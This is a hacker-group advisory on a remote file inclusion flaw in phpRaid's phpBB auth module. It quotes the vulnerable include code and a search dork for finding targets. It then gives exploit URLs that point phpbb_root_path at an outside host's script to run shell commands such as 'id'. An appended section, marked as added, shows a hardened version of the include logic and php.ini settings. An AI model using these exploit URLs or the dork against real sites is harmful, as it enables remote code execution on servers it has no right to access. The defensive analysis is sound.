
phpRaid Remote File Include Vulnerability (PHPBB)



# Kurdish Security Advisory
# phpRaid Remote File Include [PHPBB] :}
# "To insist on socialism is to insist on being human" Abdullah Ocalan
# Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com & botan@linuxmail.org

# Script : phpRaid
# Script Website : http://www.spiffyjr.com/
# Version : phpRaid v2.9.5
" v3.0.b1
" v3.0.b2
" v3.0.b3

# Risk : High
# Class : Remote
# Thanks : B3g0k, Nistiman, Flot, Netqurd, Darki, And Kurdish Hackers and Security Guards :D
# Special Bastard : Turkish Lame

# w0rkz : "phpRaid" "inurl:"phpRaid" etc. :)

---------------------------------------------------------------------

# cmd shell example:
# cmd shell variable: ($_GET[cmd]);

Vulnerable code : At first for phpbb portal :)


}
?>
// define our auth type
define("AUTH","phpbb");

// database connection
global $user_group_table;
$user_group_table = $phpbb_prefix . "user_group";

// setup phpBB user integration
define('IN_PHPBB', true);

// set this as the path to your phpBB installation
include($phpbb_root_path . 'extension.inc');
include($phpbb_root_path . 'common.'.$phpEx);

-----------------------------------------------------------------

http://www.site.com/[phpraidpath]/auth/auth.php?phpbb_root_path=http://www.yourcode.com/x.txt?&cmd=id

http://www.site.com/[phpraidpath]/auth/auth_phpbb/phpbb_root_path=http://www.yourcode.com/x.txt?&cmd=uname -a 
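
The fragment shown above never assigns `$phpbb_root_path` before the two `include()` calls, so a request parameter of that name can supply it (for example when `register_globals` is enabled). A hardened form of the same include logic follows as an added example; it is not phpRaid's or the advisory author's code. The constants `PHPRAID_ENTRY` and `PHPBB_ROOT` are hypothetical and assumed to be defined by the application's entry script and a server-side config file.

```php
<?php
// Added example: hardened variant of the include logic in the advisory.
// PHPRAID_ENTRY and PHPBB_ROOT are hypothetical names (assumptions).

// 1. Refuse direct requests to the auth file. Only the application's
//    entry script, which defines PHPRAID_ENTRY, may include it.
if (!defined('PHPRAID_ENTRY')) {
    header('HTTP/1.1 403 Forbidden');
    exit('Direct access not permitted');
}

// 2. Take the phpBB path from server-side configuration only, never from
//    a variable that the query string could populate. Assigning it here
//    overwrites anything injected into the global scope.
$phpbb_root_path = defined('PHPBB_ROOT') ? realpath(PHPBB_ROOT) : false;

// 3. realpath() resolves local filesystem paths only and returns false
//    for URLs and for paths that do not exist, so a remote location
//    cannot pass this check.
if ($phpbb_root_path === false || !is_dir($phpbb_root_path)) {
    exit('phpBB installation not found');
}
$phpbb_root_path .= DIRECTORY_SEPARATOR;

// define our auth type
define('AUTH', 'phpbb');

// setup phpBB user integration
define('IN_PHPBB', true);

// 4. Clear $phpEx before extension.inc runs so an injected value cannot
//    survive, then accept only a plain alphanumeric extension when
//    building the second include path.
unset($phpEx);
include $phpbb_root_path . 'extension.inc';
if (!isset($phpEx) || !preg_match('/^[a-z0-9]+$/i', $phpEx)) {
    $phpEx = 'php';
}
include $phpbb_root_path . 'common.' . $phpEx;
```

Independently of the code change, `register_globals = Off` and `allow_url_include = Off` in php.ini remove the preconditions for this class of include.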
